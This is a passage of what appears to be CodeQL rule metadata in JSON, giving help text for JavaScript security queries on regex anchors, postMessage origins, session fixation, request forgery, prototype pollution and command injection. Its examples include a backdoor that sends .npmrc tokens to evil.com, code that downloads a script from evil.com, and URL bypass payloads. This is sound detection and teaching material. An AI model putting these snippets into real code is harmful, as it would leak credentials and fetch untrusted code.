Malicious input can bypass such security checks by embedding one of the allowed patterns in an unexpected location.\n\nEven if the matching is not done in a security-critical context, it may still cause undesirable behavior when the regular expression accidentally matches.\n\n\n## Recommendation\nUse anchors to ensure that regular expressions match at the expected locations.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains, and not some malicious site.\n\n\n```javascript\napp.get(\"/some/path\", function(req, res) {\n let url = req.param(\"url\");\n // BAD: the host of `url` may be controlled by an attacker\n if (url.match(/https?:\\/\\/www\\.example\\.com\\//)) {\n res.redirect(url);\n }\n});\n\n```\nThe check with the regular expression match is, however, easy to bypass. For example by embedding `http://example.com/` in the query string component: `http://evil-example.net/?x=http://example.com/`. Address these shortcomings by using anchors in the regular expression instead:\n\n\n```javascript\napp.get(\"/some/path\", function(req, res) {\n let url = req.param(\"url\");\n // GOOD: the host of `url` can not be controlled by an attacker\n if (url.match(/^https?:\\/\\/www\\.example\\.com\\//)) {\n res.redirect(url);\n }\n});\n\n```\nA related mistake is to write a regular expression with multiple alternatives, but to only include an anchor for one of the alternatives. 
As an example, the regular expression `/^www\\.example\\.com|beta\\.example\\.com/` will match the host `evil.beta.example.com` because the regular expression is parsed as `/(^www\\.example\\.com)|(beta\\.example\\.com)/`\n\n\n## References\n* MDN: [Regular Expressions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions)\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n", + "markdown" : "# Missing regular expression anchor\nSanitizing untrusted input with regular expressions is a common technique. However, it is error-prone to match untrusted input against regular expressions without anchors such as `^` or `$`. Malicious input can bypass such security checks by embedding one of the allowed patterns in an unexpected location.\n\nEven if the matching is not done in a security-critical context, it may still cause undesirable behavior when the regular expression accidentally matches.\n\n\n## Recommendation\nUse anchors to ensure that regular expressions match at the expected locations.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains, and not some malicious site.\n\n\n```javascript\napp.get(\"/some/path\", function(req, res) {\n let url = req.param(\"url\");\n // BAD: the host of `url` may be controlled by an attacker\n if (url.match(/https?:\\/\\/www\\.example\\.com\\//)) {\n res.redirect(url);\n }\n});\n\n```\nThe check with the regular expression match is, however, easy to bypass. For example by embedding `http://example.com/` in the query string component: `http://evil-example.net/?x=http://example.com/`. 
Address these shortcomings by using anchors in the regular expression instead:\n\n\n```javascript\napp.get(\"/some/path\", function(req, res) {\n let url = req.param(\"url\");\n // GOOD: the host of `url` can not be controlled by an attacker\n if (url.match(/^https?:\\/\\/www\\.example\\.com\\//)) {\n res.redirect(url);\n }\n});\n\n```\nA related mistake is to write a regular expression with multiple alternatives, but to only include an anchor for one of the alternatives. As an example, the regular expression `/^www\\.example\\.com|beta\\.example\\.com/` will match the host `evil.beta.example.com` because the regular expression is parsed as `/(^www\\.example\\.com)|(beta\\.example\\.com)/`\n\n\n## References\n* MDN: [Regular Expressions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions)\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-020" ], + "description" : "Regular expressions without anchors can be vulnerable to bypassing.", + "id" : "js/regex/missing-regexp-anchor", + "kind" : "problem", + "name" : "Missing regular expression anchor", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "7.8" + } + }, { + "id" : "js/missing-origin-check", + "name" : "js/missing-origin-check", + "shortDescription" : { + "text" : "Missing origin verification in `postMessage` handler" + }, + "fullDescription" : { + "text" : "Missing origin verification in a `postMessage` handler allows any windows to send arbitrary data to the handler." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Missing origin verification in `postMessage` handler\nThe `\"message\"` event is used to send messages between windows. An untrusted window can send a message to a trusted window, and it is up to the receiver to verify the legitimacy of the message. One way of performing that verification is to check the `origin` of the message ensure that it originates from a trusted window.\n\n\n## Recommendation\nAlways verify the origin of incoming messages.\n\n\n## Example\nThe example below uses a received message to execute some code. However, the origin of the message is not checked, so it might be possible for an attacker to execute arbitrary code.\n\n\n```javascript\nfunction postMessageHandler(event) {\n let origin = event.origin.toLowerCase();\n\n console.log(origin)\n // BAD: the origin property is not checked\n eval(event.data);\n}\n\nwindow.addEventListener('message', postMessageHandler, false);\n\n```\nThe example is fixed below, where the origin is checked to be trusted. 
It is therefore not possible for a malicious user to perform an attack using an untrusted origin.\n\n\n```javascript\nfunction postMessageHandler(event) {\n console.log(event.origin)\n // GOOD: the origin property is checked\n if (event.origin === 'https://www.example.com') {\n // do something\n }\n}\n\nwindow.addEventListener('message', postMessageHandler, false);\n```\n\n## References\n* [Window.postMessage()](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage).\n* [Web message manipulation](https://portswigger.net/web-security/dom-based/web-message-manipulation).\n* [The pitfalls of postMessage](https://labs.detectify.com/2016/12/08/the-pitfalls-of-postmessage/).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-940](https://cwe.mitre.org/data/definitions/940.html).\n", + "markdown" : "# Missing origin verification in `postMessage` handler\nThe `\"message\"` event is used to send messages between windows. An untrusted window can send a message to a trusted window, and it is up to the receiver to verify the legitimacy of the message. One way of performing that verification is to check the `origin` of the message ensure that it originates from a trusted window.\n\n\n## Recommendation\nAlways verify the origin of incoming messages.\n\n\n## Example\nThe example below uses a received message to execute some code. However, the origin of the message is not checked, so it might be possible for an attacker to execute arbitrary code.\n\n\n```javascript\nfunction postMessageHandler(event) {\n let origin = event.origin.toLowerCase();\n\n console.log(origin)\n // BAD: the origin property is not checked\n eval(event.data);\n}\n\nwindow.addEventListener('message', postMessageHandler, false);\n\n```\nThe example is fixed below, where the origin is checked to be trusted. 
It is therefore not possible for a malicious user to perform an attack using an untrusted origin.\n\n\n```javascript\nfunction postMessageHandler(event) {\n console.log(event.origin)\n // GOOD: the origin property is checked\n if (event.origin === 'https://www.example.com') {\n // do something\n }\n}\n\nwindow.addEventListener('message', postMessageHandler, false);\n```\n\n## References\n* [Window.postMessage()](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage).\n* [Web message manipulation](https://portswigger.net/web-security/dom-based/web-message-manipulation).\n* [The pitfalls of postMessage](https://labs.detectify.com/2016/12/08/the-pitfalls-of-postmessage/).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-940](https://cwe.mitre.org/data/definitions/940.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-020", "external/cwe/cwe-940" ], + "description" : "Missing origin verification in a `postMessage` handler allows any windows to send arbitrary data to the handler.", + "id" : "js/missing-origin-check", + "kind" : "problem", + "name" : "Missing origin verification in `postMessage` handler", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "5" + } + }, { + "id" : "js/file-access-to-http", + "name" : "js/file-access-to-http", + "shortDescription" : { + "text" : "File data in outbound network request" + }, + "fullDescription" : { + "text" : "Directly sending file data in an outbound network request can indicate unauthorized information disclosure." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# File data in outbound network request\nSending local file system data to a remote URL without further validation risks uncontrolled information exposure, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.\n\n\n## Recommendation\nExamine the highlighted code closely to ensure that it is behaving as intended.\n\n\n## Example\nThe following example is adapted from backdoor code that was identified in two popular npm packages. It reads the contents of the `.npmrc` file (which may contain secret npm tokens) and sends it to a remote server by embedding it into an HTTP request header.\n\n\n```javascript\nvar fs = require(\"fs\"),\n https = require(\"https\");\n\nvar content = fs.readFileSync(\".npmrc\", \"utf8\");\nhttps.get({\n hostname: \"evil.com\",\n path: \"/upload\",\n method: \"GET\",\n headers: { Referer: content }\n}, () => { });\n\n```\n\n## References\n* ESLint Blog: [Postmortem for Malicious Packages Published on July 12th, 2018](https://eslint.org/blog/2018/07/postmortem-for-malicious-package-publishes).\n* OWASP: [Sensitive Data Exposure](https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure).\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n", + "markdown" : "# File data in outbound network request\nSending local file system data to a remote URL without further validation risks uncontrolled information exposure, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.\n\n\n## Recommendation\nExamine the highlighted code closely to ensure that it is behaving as intended.\n\n\n## Example\nThe following example is adapted from backdoor code that was identified in two popular npm packages. 
It reads the contents of the `.npmrc` file (which may contain secret npm tokens) and sends it to a remote server by embedding it into an HTTP request header.\n\n\n```javascript\nvar fs = require(\"fs\"),\n https = require(\"https\");\n\nvar content = fs.readFileSync(\".npmrc\", \"utf8\");\nhttps.get({\n hostname: \"evil.com\",\n path: \"/upload\",\n method: \"GET\",\n headers: { Referer: content }\n}, () => { });\n\n```\n\n## References\n* ESLint Blog: [Postmortem for Malicious Packages Published on July 12th, 2018](https://eslint.org/blog/2018/07/postmortem-for-malicious-package-publishes).\n* OWASP: [Sensitive Data Exposure](https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure).\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-200" ], + "description" : "Directly sending file data in an outbound network request can indicate unauthorized information disclosure.", + "id" : "js/file-access-to-http", + "kind" : "path-problem", + "name" : "File data in outbound network request", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "6.5" + } + }, { + "id" : "js/session-fixation", + "name" : "js/session-fixation", + "shortDescription" : { + "text" : "Failure to abandon session" + }, + "fullDescription" : { + "text" : "Reusing an existing session as a different user could allow an attacker to access someone else's account by using their session." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Failure to abandon session\nReusing a session could allow an attacker to gain unauthorized access to another account. 
Always ensure that, when a user logs in or out, the current session is abandoned so that a new session may be started.\n\n\n## Recommendation\nAlways use `req.session.regenerate(...);` to start a new session when a user logs in or out.\n\n\n## Example\nThe following example shows the previous session being used after authentication. This would allow a previous user to use the new user's account.\n\n\n```javascript\nconst express = require('express');\nconst session = require('express-session');\nvar bodyParser = require('body-parser')\nconst app = express();\napp.use(bodyParser.urlencoded({ extended: false }))\napp.use(session({\n secret: 'keyboard cat'\n}));\n\napp.post('/login', function (req, res) {\n // Check that username password matches\n if (req.body.username === 'admin' && req.body.password === 'admin') {\n req.session.authenticated = true;\n res.redirect('/');\n } else {\n res.redirect('/login');\n }\n});\n```\nThis code example solves the problem by not reusing the session, and instead calling `req.session.regenerate()` to ensure that the session is not reused.\n\n\n```javascript\nconst express = require('express');\nconst session = require('express-session');\nvar bodyParser = require('body-parser')\nconst app = express();\napp.use(bodyParser.urlencoded({ extended: false }))\napp.use(session({\n secret: 'keyboard cat'\n}));\n\napp.post('/login', function (req, res) {\n // Check that username password matches\n if (req.body.username === 'admin' && req.body.password === 'admin') {\n req.session.regenerate(function (err) {\n if (err) {\n res.send('Error');\n } else {\n req.session.authenticated = true;\n res.redirect('/');\n }\n });\n } else {\n res.redirect('/login');\n }\n});\n```\n\n## References\n* OWASP: [Session fixation](https://www.owasp.org/index.php/Session_fixation)\n* Stack Overflow: [Creating a new session after authentication with 
Passport](https://stackoverflow.com/questions/22209354/creating-a-new-session-after-authentication-with-passport/30468384#30468384)\n* jscrambler.com: [Best practices for secure session management in Node](https://blog.jscrambler.com/best-practices-for-secure-session-management-in-node)\n* Common Weakness Enumeration: [CWE-384](https://cwe.mitre.org/data/definitions/384.html).\n", + "markdown" : "# Failure to abandon session\nReusing a session could allow an attacker to gain unauthorized access to another account. Always ensure that, when a user logs in or out, the current session is abandoned so that a new session may be started.\n\n\n## Recommendation\nAlways use `req.session.regenerate(...);` to start a new session when a user logs in or out.\n\n\n## Example\nThe following example shows the previous session being used after authentication. This would allow a previous user to use the new user's account.\n\n\n```javascript\nconst express = require('express');\nconst session = require('express-session');\nvar bodyParser = require('body-parser')\nconst app = express();\napp.use(bodyParser.urlencoded({ extended: false }))\napp.use(session({\n secret: 'keyboard cat'\n}));\n\napp.post('/login', function (req, res) {\n // Check that username password matches\n if (req.body.username === 'admin' && req.body.password === 'admin') {\n req.session.authenticated = true;\n res.redirect('/');\n } else {\n res.redirect('/login');\n }\n});\n```\nThis code example solves the problem by not reusing the session, and instead calling `req.session.regenerate()` to ensure that the session is not reused.\n\n\n```javascript\nconst express = require('express');\nconst session = require('express-session');\nvar bodyParser = require('body-parser')\nconst app = express();\napp.use(bodyParser.urlencoded({ extended: false }))\napp.use(session({\n secret: 'keyboard cat'\n}));\n\napp.post('/login', function (req, res) {\n // Check that username password matches\n if (req.body.username === 'admin' 
&& req.body.password === 'admin') {\n req.session.regenerate(function (err) {\n if (err) {\n res.send('Error');\n } else {\n req.session.authenticated = true;\n res.redirect('/');\n }\n });\n } else {\n res.redirect('/login');\n }\n});\n```\n\n## References\n* OWASP: [Session fixation](https://www.owasp.org/index.php/Session_fixation)\n* Stack Overflow: [Creating a new session after authentication with Passport](https://stackoverflow.com/questions/22209354/creating-a-new-session-after-authentication-with-passport/30468384#30468384)\n* jscrambler.com: [Best practices for secure session management in Node](https://blog.jscrambler.com/best-practices-for-secure-session-management-in-node)\n* Common Weakness Enumeration: [CWE-384](https://cwe.mitre.org/data/definitions/384.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-384" ], + "description" : "Reusing an existing session as a different user could allow\n an attacker to access someone else's account by using\n their session.", + "id" : "js/session-fixation", + "kind" : "problem", + "name" : "Failure to abandon session", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "5" + } + }, { + "id" : "js/client-side-request-forgery", + "name" : "js/client-side-request-forgery", + "shortDescription" : { + "text" : "Client-side request forgery" + }, + "fullDescription" : { + "text" : "Making a client-to-server request with user-controlled data in the URL allows a request forgery attack against the client." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Client-side request forgery\nDirectly incorporating user input in the URL of an outgoing HTTP request can enable a request forgery attack, in which the request is altered to target an unintended API endpoint or resource. 
A client-side forged request may perform an unwanted action affecting the victim's account, or may lead to cross-site scripting if the request response is handled in an unsafe way. This is different from CSRF (cross-site request forgery), and will usually bypass CSRF protections. This is usually less severe than SSRF (server-side request forgery), as it does not expose internal services.\n\n\n## Recommendation\nRestrict user inputs in the URL of an outgoing request, in particular:\n\n* Avoid user input in the hostname of the URL. Pick the hostname from an allow-list instead of constructing it directly from user input.\n* Take care when user input is part of the pathname of the URL. Restrict the input so that path traversal (\"`../`\") cannot be used to redirect the request to an unintended endpoint.\n\n## Example\nThe following example shows an HTTP request used to fetch the pre-rendered HTML body of a message. It is using the endpoint `/api/messages/ID`, which is believed to respond with a safe HTML string, to be embedded in the page:\n\n\n```javascript\nasync function loadMessage() {\n const query = new URLSearchParams(location.search);\n const url = '/api/messages/' + query.get('message_id');\n const data = await (await fetch(url)).json();\n document.getElementById('message').innerHTML = data.html;\n}\n\n```\nHowever, the format of the message ID is not checked, and an attacker can abuse this to alter the endpoint targeted by the request. If they can redirect it to an endpoint that returns an untrusted value, this leads to cross-site scripting.\n\nFor example, given the query string `message_id=../pastebin/123`, the request will end up targeting the `/api/pastebin` endpoint. 
Or if there is an open redirect on the login page, a query string like `message_id=../../login?redirect_url=https://evil.com` could give the attacker full control over the response as well.\n\nIn example below, the input has been restricted to a number so that the endpoint cannot be altered:\n\n\n```javascript\nasync function loadMessage() {\n const query = new URLSearchParams(location.search);\n const url = '/api/messages/' + Number(query.get('message_id'));\n const data = await (await fetch(url)).json();\n document.getElementById('message').innerHTML = data.html;\n}\n\n```\n\n## References\n* OWASP: [Server-side request forgery](https://cwe.mitre.org/data/definitions/918.html)\n* OWASP: [Cross-site request forgery](https://cwe.mitre.org/data/definitions/352.html)\n* Common Weakness Enumeration: [CWE-918](https://cwe.mitre.org/data/definitions/918.html).\n", + "markdown" : "# Client-side request forgery\nDirectly incorporating user input in the URL of an outgoing HTTP request can enable a request forgery attack, in which the request is altered to target an unintended API endpoint or resource. A client-side forged request may perform an unwanted action affecting the victim's account, or may lead to cross-site scripting if the request response is handled in an unsafe way. This is different from CSRF (cross-site request forgery), and will usually bypass CSRF protections. This is usually less severe than SSRF (server-side request forgery), as it does not expose internal services.\n\n\n## Recommendation\nRestrict user inputs in the URL of an outgoing request, in particular:\n\n* Avoid user input in the hostname of the URL. Pick the hostname from an allow-list instead of constructing it directly from user input.\n* Take care when user input is part of the pathname of the URL. 
Restrict the input so that path traversal (\"`../`\") cannot be used to redirect the request to an unintended endpoint.\n\n## Example\nThe following example shows an HTTP request used to fetch the pre-rendered HTML body of a message. It is using the endpoint `/api/messages/ID`, which is believed to respond with a safe HTML string, to be embedded in the page:\n\n\n```javascript\nasync function loadMessage() {\n const query = new URLSearchParams(location.search);\n const url = '/api/messages/' + query.get('message_id');\n const data = await (await fetch(url)).json();\n document.getElementById('message').innerHTML = data.html;\n}\n\n```\nHowever, the format of the message ID is not checked, and an attacker can abuse this to alter the endpoint targeted by the request. If they can redirect it to an endpoint that returns an untrusted value, this leads to cross-site scripting.\n\nFor example, given the query string `message_id=../pastebin/123`, the request will end up targeting the `/api/pastebin` endpoint. 
Or if there is an open redirect on the login page, a query string like `message_id=../../login?redirect_url=https://evil.com` could give the attacker full control over the response as well.\n\nIn example below, the input has been restricted to a number so that the endpoint cannot be altered:\n\n\n```javascript\nasync function loadMessage() {\n const query = new URLSearchParams(location.search);\n const url = '/api/messages/' + Number(query.get('message_id'));\n const data = await (await fetch(url)).json();\n document.getElementById('message').innerHTML = data.html;\n}\n\n```\n\n## References\n* OWASP: [Server-side request forgery](https://cwe.mitre.org/data/definitions/918.html)\n* OWASP: [Cross-site request forgery](https://cwe.mitre.org/data/definitions/352.html)\n* Common Weakness Enumeration: [CWE-918](https://cwe.mitre.org/data/definitions/918.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-918" ], + "description" : "Making a client-to-server request with user-controlled data in the URL allows a request forgery attack\n against the client.", + "id" : "js/client-side-request-forgery", + "kind" : "path-problem", + "name" : "Client-side request forgery", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "5.0" + } + }, { + "id" : "js/remote-property-injection", + "name" : "js/remote-property-injection", + "shortDescription" : { + "text" : "Remote property injection" + }, + "fullDescription" : { + "text" : "Allowing writes to arbitrary properties of an object may lead to denial-of-service attacks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Remote property injection\nDynamically computing object property names from untrusted input may have multiple undesired consequences. For example, if the property access is used as part of a write, an attacker may overwrite vital properties of objects, such as `__proto__`. 
This attack is known as *prototype pollution attack* and may serve as a vehicle for denial-of-service attacks. A similar attack vector, is to replace the `toString` property of an object with a primitive. Whenever `toString` is then called on that object, either explicitly or implicitly as part of a type coercion, an exception will be raised.\n\nMoreover, if the name of an HTTP header is user-controlled, an attacker may exploit this to overwrite security-critical headers such as `Access-Control-Allow-Origin` or `Content-Security-Policy`.\n\n\n## Recommendation\nThe most common case in which prototype pollution vulnerabilities arise is when JavaScript objects are used for implementing map data structures. This case should be avoided whenever possible by using the ECMAScript 2015 `Map` instead. When this is not possible, an alternative fix is to prepend untrusted input with a marker character such as `$`, before using it in properties accesses. In this way, the attacker does not have access to built-in properties which do not start with the chosen character.\n\nWhen using user input as part of a header name, a sanitization step should be performed on the input to ensure that the name does not clash with existing header names such as `Content-Security-Policy`.\n\n\n## Example\nIn the example below, the dynamically computed property `prop` is accessed on `myObj` using a user-controlled value.\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\nvar myObj = {}\n\napp.get('/user/:id', function(req, res) {\n\tvar prop = req.query.userControlled; // BAD\n\tmyObj[prop] = function() {};\n\tconsole.log(\"Request object \" + myObj);\n});\n```\nThis is not secure since an attacker may exploit this code to overwrite the property `__proto__` with an empty function. If this happens, the concatenation in the `console.log` argument will fail with a confusing message such as \"Function.prototype.toString is not generic\". 
If the application does not properly handle this error, this scenario may result in a serious denial-of-service attack. The fix is to prepend the user-controlled string with a marker character such as `$` which will prevent arbitrary property names from being overwritten.\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\nvar myObj = {}\n\napp.get('/user/:id', function(req, res) {\n\tvar prop = \"$\" + req.query.userControlled; // GOOD\n\tmyObj[prop] = function() {};\n\tconsole.log(\"Request object \" + myObj);\n});\n```\n\n## References\n* Prototype pollution attacks: [electron](https://github.com/electron/electron/pull/9287), [lodash](https://hackerone.com/reports/310443), [hoek](https://npmjs.com/advisories/566).\n* Penetration testing report: [ header name injection attack](http://seclists.org/pen-test/2009/Mar/67)\n* npm blog post: [ dangers of square bracket notation](https://github.com/nodesecurity/eslint-plugin-security/blob/3c7522ca1be800353513282867a1034c795d9eb4/docs/the-dangers-of-square-bracket-notation.md)\n* Common Weakness Enumeration: [CWE-250](https://cwe.mitre.org/data/definitions/250.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", + "markdown" : "# Remote property injection\nDynamically computing object property names from untrusted input may have multiple undesired consequences. For example, if the property access is used as part of a write, an attacker may overwrite vital properties of objects, such as `__proto__`. This attack is known as *prototype pollution attack* and may serve as a vehicle for denial-of-service attacks. A similar attack vector, is to replace the `toString` property of an object with a primitive. 
Whenever `toString` is then called on that object, either explicitly or implicitly as part of a type coercion, an exception will be raised.\n\nMoreover, if the name of an HTTP header is user-controlled, an attacker may exploit this to overwrite security-critical headers such as `Access-Control-Allow-Origin` or `Content-Security-Policy`.\n\n\n## Recommendation\nThe most common case in which prototype pollution vulnerabilities arise is when JavaScript objects are used for implementing map data structures. This case should be avoided whenever possible by using the ECMAScript 2015 `Map` instead. When this is not possible, an alternative fix is to prepend untrusted input with a marker character such as `$`, before using it in properties accesses. In this way, the attacker does not have access to built-in properties which do not start with the chosen character.\n\nWhen using user input as part of a header name, a sanitization step should be performed on the input to ensure that the name does not clash with existing header names such as `Content-Security-Policy`.\n\n\n## Example\nIn the example below, the dynamically computed property `prop` is accessed on `myObj` using a user-controlled value.\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\nvar myObj = {}\n\napp.get('/user/:id', function(req, res) {\n\tvar prop = req.query.userControlled; // BAD\n\tmyObj[prop] = function() {};\n\tconsole.log(\"Request object \" + myObj);\n});\n```\nThis is not secure since an attacker may exploit this code to overwrite the property `__proto__` with an empty function. If this happens, the concatenation in the `console.log` argument will fail with a confusing message such as \"Function.prototype.toString is not generic\". If the application does not properly handle this error, this scenario may result in a serious denial-of-service attack. 
The fix is to prepend the user-controlled string with a marker character such as `$` which will prevent arbitrary property names from being overwritten.\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\nvar myObj = {}\n\napp.get('/user/:id', function(req, res) {\n\tvar prop = \"$\" + req.query.userControlled; // GOOD\n\tmyObj[prop] = function() {};\n\tconsole.log(\"Request object \" + myObj);\n});\n```\n\n## References\n* Prototype pollution attacks: [electron](https://github.com/electron/electron/pull/9287), [lodash](https://hackerone.com/reports/310443), [hoek](https://npmjs.com/advisories/566).\n* Penetration testing report: [ header name injection attack](http://seclists.org/pen-test/2009/Mar/67)\n* npm blog post: [ dangers of square bracket notation](https://github.com/nodesecurity/eslint-plugin-security/blob/3c7522ca1be800353513282867a1034c795d9eb4/docs/the-dangers-of-square-bracket-notation.md)\n* Common Weakness Enumeration: [CWE-250](https://cwe.mitre.org/data/definitions/250.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-250", "external/cwe/cwe-400" ], + "description" : "Allowing writes to arbitrary properties of an object may lead to\n denial-of-service attacks.", + "id" : "js/remote-property-injection", + "kind" : "path-problem", + "name" : "Remote property injection", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/http-to-file-access", + "name" : "js/http-to-file-access", + "shortDescription" : { + "text" : "Network data written to file" + }, + "fullDescription" : { + "text" : "Writing network data directly to the file system allows arbitrary file upload and might indicate a backdoor." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Network data written to file\nStoring user-controlled data on the local file system without further validation allows arbitrary file upload, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.\n\n\n## Recommendation\nExamine the highlighted code closely to ensure that it is behaving as intended.\n\n\n## Example\nThe following example shows backdoor code that downloads data from the URL `https://evil.com/script`, and stores it in the local file `/tmp/script`.\n\n\n```javascript\nvar https = require(\"https\");\nvar fs = require(\"fs\");\n\nhttps.get('https://evil.com/script', res => {\n res.on(\"data\", d => {\n fs.writeFileSync(\"/tmp/script\", d)\n })\n});\n\n```\nOther parts of the program might then assume that since `/tmp/script` is a local file its contents can be trusted, while in fact they are obtained from an untrusted remote source.\n\n\n## References\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* OWASP: [Unrestricted File Upload](https://www.owasp.org/index.php/Unrestricted_File_Upload).\n* Common Weakness Enumeration: [CWE-912](https://cwe.mitre.org/data/definitions/912.html).\n* Common Weakness Enumeration: [CWE-434](https://cwe.mitre.org/data/definitions/434.html).\n", + "markdown" : "# Network data written to file\nStoring user-controlled data on the local file system without further validation allows arbitrary file upload, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.\n\n\n## Recommendation\nExamine the highlighted code closely to ensure that it is behaving as intended.\n\n\n## Example\nThe following example shows backdoor code that downloads data from the URL `https://evil.com/script`, and stores it in the local file `/tmp/script`.\n\n\n```javascript\nvar https = require(\"https\");\nvar fs 
= require(\"fs\");\n\nhttps.get('https://evil.com/script', res => {\n res.on(\"data\", d => {\n fs.writeFileSync(\"/tmp/script\", d)\n })\n});\n\n```\nOther parts of the program might then assume that since `/tmp/script` is a local file its contents can be trusted, while in fact they are obtained from an untrusted remote source.\n\n\n## References\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* OWASP: [Unrestricted File Upload](https://www.owasp.org/index.php/Unrestricted_File_Upload).\n* Common Weakness Enumeration: [CWE-912](https://cwe.mitre.org/data/definitions/912.html).\n* Common Weakness Enumeration: [CWE-434](https://cwe.mitre.org/data/definitions/434.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-912", "external/cwe/cwe-434" ], + "description" : "Writing network data directly to the file system allows arbitrary file upload and might indicate a backdoor.", + "id" : "js/http-to-file-access", + "kind" : "path-problem", + "name" : "Network data written to file", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "6.3" + } + }, { + "id" : "js/indirect-command-line-injection", + "name" : "js/indirect-command-line-injection", + "shortDescription" : { + "text" : "Indirect uncontrolled command line" + }, + "fullDescription" : { + "text" : "Forwarding command-line arguments to a child process executed within a shell may indirectly introduce command-line injection vulnerabilities." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Indirect uncontrolled command line\nForwarding command-line arguments to `child_process.exec` or some other library routine that executes a system command within a shell can change the meaning of the command unexpectedly due to unescaped special characters.\n\nWhen the forwarded command-line arguments come from a parent process that has not escaped the special characters in the arguments, then the parent process may indirectly be vulnerable to command-line injection since the special characters are evaluated unexpectedly.\n\n\n## Recommendation\nIf possible, use APIs that don't run shell commands and accept command arguments as an array of strings rather than a single concatenated string. This is both safer and more portable.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nIf this approach is not viable, then add code to verify that each forwarded command-line argument is properly escaped before using it.\n\n\n## Example\nThe following wrapper script example executes another JavaScript file in a child process and forwards some command-line arguments. This is problematic because the special characters in the command-line arguments may change the meaning of the child process invocation unexpectedly. 
For instance, if one of the command-line arguments is `\"dollar$separated$name\"`, then the child process will substitute the two environment variables `$separated` and `$name` before invoking `node`.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nconst args = process.argv.slice(2);\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execSync(`node ${script} ${args.join(' ')}`); // BAD\n\n```\nIf another program uses `child_process.execFile` to invoke the above wrapper script with input from a remote user, then there may be a command-line injection vulnerability. This may be surprising, since a command-line invocation with `child_process.execFile` is generally considered safe. But in this case, the remote user input is simply forwarded to the problematic `process.exec` call in the wrapper script.\n\nTo guard against this, use an API that does not perform environment variable substitution, such as `child_process.execFile`:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nconst args = process.argv.slice(2);\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execFileSync('node', [script].concat(args)); // GOOD\n\n```\nIf you want to allow the user to specify other options to `node`, you can use a library like `shell-quote` to parse the user input into an array of arguments without risking command 